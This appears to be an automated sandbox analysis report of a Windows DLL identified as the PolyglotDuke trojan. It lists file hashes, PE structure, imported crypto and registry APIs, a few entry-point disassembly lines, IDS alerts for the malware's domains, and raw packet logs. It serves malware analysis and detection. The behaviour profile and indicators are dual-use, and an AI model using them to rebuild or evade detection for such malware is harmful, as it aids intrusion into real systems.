                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):24330
                                                                                                                                                Entropy (8bit):5.181008011862252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:UqiAQ7qiAQ7qiAQ7qiAQ7qiAQ7qiAQ7qiAQ7qiAQ7qiAQ7qiAQu:lBBBBBBBBBD
                                                                                                                                                MD5:D1942EDB1E1C17EB101AD2CB58823436
                                                                                                                                                SHA1:354CCF9610099EFB225BDA06692ACC9395944F17
                                                                                                                                                SHA-256:86E7D8C1AE30DF38AAD5B23505725CF3110AA491247EFC492E9DBA93FAE95076
                                                                                                                                                SHA-512:385663CB19D6B9CF012E714455F00AFC30678BE344F7B6B9A78E307B69C2334B12F98FB71177167123FBED3DF3D542B5B08050460B3CEA64C90075C5E07CA7F9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                IE Cache URL:https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Preview: <!DOCTYPE html>.<html>..<head>. <link rel="manifest" href="/manifest.json">. <meta name="robots" content="noindex,nofollow">. <meta charset="utf-8" />. <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />. <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1" />. <meta name="theme-color" content="#3361cc" />. <meta name="referrer" content="origin" />. <title>my Japanese language blog</title>. <link href="https://fonts.googleapis.com/css?family=Noto+Serif" rel="stylesheet" />. <link rel="shortcut icon" type="image/x-icon" sizes="16x16 32x32 64x64" href="/favicon.ico" />. <link href="/css/published.css?t=433261265802441828" media="all" rel="stylesheet" type="text/css" />. <link rel="canonical" href="https://app.simplenote.com/publish/pBn8Jt" />.</head>..<body>. <div class="published-wrap no-ad-size">. <div class="wrapper">. <div class="app">. <div class="note note-detail-markdown">. . <p id="title">
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\vz1g3wmwu[1].htm
                                                                                                                                                Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):45
                                                                                                                                                Entropy (8bit):1.5219280948873621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:hsGyGyGyGyGyGyGyy:Wnnnnnnny
                                                                                                                                                MD5:5EFA9BFAA53E9E5F623842F7CCA8A3F6
                                                                                                                                                SHA1:F1E69FC32BAF2AE6062F82B4520AE50DA6D66BA1
                                                                                                                                                SHA-256:B16BB4ABE46491E7DFADEAF6814353634637939729E022F7DB2FD3CA7FFE0723
                                                                                                                                                SHA-512:4DAF052CF2024021FBD99201506AE33EC5485DDB5CE2678BA08C05C1B3AAB488B751D57DF0D58BA0FE03F404376CFDD80FC2BD95EB3F44D9278970B54D66896E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: 0....0....0....0....0....0....0....0....0....

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                Entropy (8bit):5.161682116367838
                                                                                                                                                TrID:
                                                                                                                                                • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                                • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                                • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                File name:unmapped_executable_of_polyglot_duke.dll
                                                                                                                                                File size:114688
                                                                                                                                                MD5:b06e835c0c28ecc8dec84cfc1ac10285
                                                                                                                                                SHA1:de1df46e1fa3ff9c500efb8b367c663f2317f4dd
                                                                                                                                                SHA256:68b2524160410a18cd61ba66d9699cdfde6a4c7ffc207667d20c90fa84a03a87
                                                                                                                                                SHA512:a37de9484c6601c5ded3414123f18cac09dd0b106ba9a0cc8ff7e741a339c9d506d8127bacaa69a015b06c4c69533702ca2e2f6900790ed06e98a88e05f7f497
                                                                                                                                                SSDEEP:3072:xPVbj7oUAE7Pc0g1TTCtIIDoz6XFTVgE0f:xZmE7YTU5DzVRgEe
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I"y..C...C...C..b5...C..b5..oC..b5...C...;...C...C...C..b5...C..b5...C..b5...C..Rich.C..........PE..d...!t.Z.........." .......

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x218348
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x210000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                Time Stamp:0x5A017421 [Tue Nov 7 08:51:45 2017 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:2
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:2
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                Import Hash:3c837bb6ea579ded531450913dab009e

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+08h], ebx
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+10h], esi
                                                                                                                                                push edi
                                                                                                                                                dec eax
                                                                                                                                                sub esp, 20h
                                                                                                                                                dec ecx
                                                                                                                                                mov edi, eax
                                                                                                                                                mov ebx, edx
                                                                                                                                                dec eax
                                                                                                                                                mov esi, ecx
                                                                                                                                                cmp edx, 01h
                                                                                                                                                jne 00007F6B14DC3287h
                                                                                                                                                call 00007F6B14DC7C04h
                                                                                                                                                dec esp
                                                                                                                                                mov eax, edi
                                                                                                                                                mov edx, ebx
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, esi
                                                                                                                                                dec eax
                                                                                                                                                mov ebx, dword ptr [esp+30h]
                                                                                                                                                dec eax
                                                                                                                                                mov esi, dword ptr [esp+38h]
                                                                                                                                                dec eax
                                                                                                                                                add esp, 20h
                                                                                                                                                pop edi
                                                                                                                                                jmp 00007F6B14DC312Ch
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+08h], ecx
                                                                                                                                                dec eax
                                                                                                                                                sub esp, 00000088h
                                                                                                                                                dec eax
                                                                                                                                                lea ecx, dword ptr [0000F125h]
                                                                                                                                                call dword ptr [00008EEFh]
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0000F210h]
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+58h], eax
                                                                                                                                                inc ebp
                                                                                                                                                xor eax, eax
                                                                                                                                                dec eax
                                                                                                                                                lea edx, dword ptr [esp+60h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [esp+58h]
                                                                                                                                                call 00007F6B14DCB364h
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+50h], eax
                                                                                                                                                dec eax
                                                                                                                                                cmp dword ptr [esp+50h], 00000000h
                                                                                                                                                je 00007F6B14DC32C3h
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+38h], 00000000h
                                                                                                                                                dec eax
                                                                                                                                                lea eax, dword ptr [esp+48h]
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+30h], eax
                                                                                                                                                dec eax
                                                                                                                                                lea eax, dword ptr [esp+40h]
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+28h], eax
                                                                                                                                                dec eax
                                                                                                                                                lea eax, dword ptr [0000F0D0h]
                                                                                                                                                dec eax
                                                                                                                                                mov dword ptr [esp+20h], eax
                                                                                                                                                dec esp
                                                                                                                                                mov ecx, dword ptr [esp+50h]
                                                                                                                                                dec esp
                                                                                                                                                mov eax, dword ptr [esp+58h]
                                                                                                                                                dec eax
                                                                                                                                                mov edx, dword ptr [esp+60h]
                                                                                                                                                xor ecx, ecx
                                                                                                                                                call 00007F6B14DCB312h
                                                                                                                                                jmp 00007F6B14DC32A4h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [eax+eax+00000000h]

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [LNK] VS2010 build 30319
                                                                                                                                                • [ASM] VS2010 build 30319
                                                                                                                                                • [ C ] VS2010 build 30319
                                                                                                                                                • [C++] VS2010 build 30319
                                                                                                                                                • [EXP] VS2010 build 30319
                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x151800x44.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x144380x78.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1a0000xbd0.pdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1b0000x164.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x110000x408.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000xf6cf0xf6cfFalse0.575392114968zlib compressed data6.32058061261IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0x110000x41c40x41c4False0.433832264196data5.25507230255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x160000x3b400x3b40False0.0659941983122data0.863653038768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .pdata0x1a0000xbd00xbd0False0.505621693122data4.89467499207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x1b0000x3200x320False0.36625data3.05705448421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllGetSystemDirectoryA, CreateFileW, lstrcatA, lstrcmpW, lstrlenW, OpenMutexW, GetLastError, GetProcAddress, FindClose, LoadLibraryA, lstrcatW, FindNextFileW, CloseHandle, lstrcpyW, GetModuleFileNameW, CreateThread, lstrcpyA, WriteConsoleW, SetStdHandle, HeapSize, GetStringTypeW, GetConsoleMode, GetConsoleCP, GetFileAttributesW, lstrcpynW, GetVersionExW, Sleep, LoadLibraryW, WideCharToMultiByte, GetSystemDirectoryW, WriteFile, GetModuleHandleW, GetComputerNameW, CreateDirectoryW, GetCurrentProcess, CreateProcessW, SetErrorMode, SetEndOfFile, lstrcpynA, lstrlenA, FindFirstFileW, MultiByteToWideChar, CreateMutexW, GetTempFileNameW, GetVersion, GetVolumeInformationW, SetFilePointer, HeapFree, HeapAlloc, HeapReAlloc, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, HeapSetInformation, HeapCreate, HeapDestroy, ExitProcess, DecodePointer, GetStdHandle, EncodePointer, FlsGetValue, FlsFree, SetLastError, FlsAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, RtlUnwindEx, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, GetStartupInfoW, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, FlushFileBuffers
                                                                                                                                                USER32.dllDispatchMessageW, GetMessageW, wsprintfA, wsprintfW, TranslateMessage, CharUpperBuffA, GetDesktopWindow, CreateWindowExW
                                                                                                                                                ADVAPI32.dllCryptDestroyHash, CryptHashData, RegSetValueExW, RegCloseKey, CryptDecrypt, CryptDestroyKey, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, CryptGenRandom, GetFileSecurityW, DuplicateToken, RegQueryValueExW, RegCreateKeyExW, AccessCheck, MapGenericMask, GetUserNameW, CryptVerifySignatureW, CryptAcquireContextW, OpenProcessToken, CryptGetHashParam
                                                                                                                                                SHELL32.dllSHFileOperationW
                                                                                                                                                ole32.dllCoInitialize

                                                                                                                                                Exports

                                                                                                                                                NameOrdinalAddress
                                                                                                                                                InitSvc10x2111e0

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                02/22/21-23:43:59.004767UDP2028850ET TROJAN PolyglotDuke Domain Observed5406453192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:03.776861UDP2028850ET TROJAN PolyglotDuke Domain Observed5498253192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:07.991557UDP2028850ET TROJAN PolyglotDuke Domain Observed6381653192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:13.409130UDP2028850ET TROJAN PolyglotDuke Domain Observed5501453192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:17.268011UDP2028850ET TROJAN PolyglotDuke Domain Observed6220853192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:21.494103UDP2028850ET TROJAN PolyglotDuke Domain Observed5757453192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:25.394740UDP2028850ET TROJAN PolyglotDuke Domain Observed5662853192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:30.066057UDP2028850ET TROJAN PolyglotDuke Domain Observed6077853192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:35.155323UDP2028850ET TROJAN PolyglotDuke Domain Observed5379953192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:39.190033UDP2028850ET TROJAN PolyglotDuke Domain Observed5468353192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:43.113280UDP2028850ET TROJAN PolyglotDuke Domain Observed6117853192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:47.341014UDP2028850ET TROJAN PolyglotDuke Domain Observed5506653192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:47.401242UDP2018316ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses53550668.8.8.8192.168.2.6
                                                                                                                                                02/22/21-23:44:52.641738UDP2028850ET TROJAN PolyglotDuke Domain Observed5657053192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:44:56.580498UDP2028850ET TROJAN PolyglotDuke Domain Observed5845453192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:00.952073UDP2028850ET TROJAN PolyglotDuke Domain Observed5518053192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:05.044641UDP2028850ET TROJAN PolyglotDuke Domain Observed5872153192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:09.085296UDP2028850ET TROJAN PolyglotDuke Domain Observed5769153192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:13.667998UDP2028850ET TROJAN PolyglotDuke Domain Observed5294353192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:17.671548UDP2028850ET TROJAN PolyglotDuke Domain Observed5948953192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:22.663036UDP2028850ET TROJAN PolyglotDuke Domain Observed6402253192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:26.783954UDP2028850ET TROJAN PolyglotDuke Domain Observed5024853192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:31.276860UDP2028850ET TROJAN PolyglotDuke Domain Observed6441353192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:35.335814UDP2028850ET TROJAN PolyglotDuke Domain Observed6034553192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:39.328581UDP2028850ET TROJAN PolyglotDuke Domain Observed5873053192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:43.494562UDP2028850ET TROJAN PolyglotDuke Domain Observed5383053192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:48.275801UDP2028850ET TROJAN PolyglotDuke Domain Observed5318753192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:52.765243UDP2028850ET TROJAN PolyglotDuke Domain Observed5572853192.168.2.68.8.8.8
                                                                                                                                                02/22/21-23:45:57.318004UDP2028850ET TROJAN PolyglotDuke Domain Observed5569453192.168.2.68.8.8.8

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Feb 22, 2021 23:43:57.116450071 CET4971680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.189415932 CET80497165.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.189516068 CET4971680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.189940929 CET4971680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.260957956 CET80497165.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.261218071 CET80497165.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.261327028 CET4971680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.267301083 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.335647106 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.335766077 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.354820967 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.425118923 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.426192999 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.426294088 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.426296949 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.426363945 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.426378012 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.426460981 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.504554033 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.573168039 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.573256016 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.608705044 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:57.720024109 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122026920 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122128010 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122199059 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122222900 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.122260094 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122268915 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.122275114 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.122323990 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122330904 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.122380018 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.122380018 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122436047 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.122493982 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.122574091 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.131159067 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.199616909 CET443497175.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.199740887 CET49717443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:43:58.202604055 CET4971980192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:43:58.368066072 CET8049719192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.368182898 CET4971980192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:43:58.368573904 CET4971980192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:43:58.534480095 CET8049719192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.534533024 CET8049719192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.534621000 CET4971980192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:43:58.608403921 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.650727034 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.650819063 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.651505947 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.692517042 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.701762915 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.701847076 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.701884985 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.701898098 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.701917887 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.701953888 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.717833996 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.764269114 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.766098976 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.766201019 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.767357111 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.815330029 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.975327969 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.975383997 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.975423098 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.975441933 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.975461960 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.975498915 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:58.975529909 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.975588083 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:43:59.232003927 CET4972280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.290025949 CET8049722104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.290168047 CET4972280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.290610075 CET4972280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.348469019 CET8049722104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.450372934 CET8049722104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.450474024 CET4972280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.456571102 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.513061047 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.513180017 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.516499043 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.572952032 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.574140072 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.574172974 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.574203968 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.574253082 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.574300051 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.587205887 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.643537045 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.643584013 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.643692970 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.644287109 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.701812029 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.817825079 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.817953110 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:43:59.910754919 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:43:59.967349052 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.967447042 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:43:59.968401909 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.026984930 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.028086901 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.028106928 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.028131962 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.028263092 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.028312922 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.045283079 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.101613998 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.101722002 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.101860046 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.102552891 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.160156965 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285521984 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285597086 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285644054 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.285655022 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285674095 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.285717964 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285718918 CET49725443192.168.2.6104.244.42.70
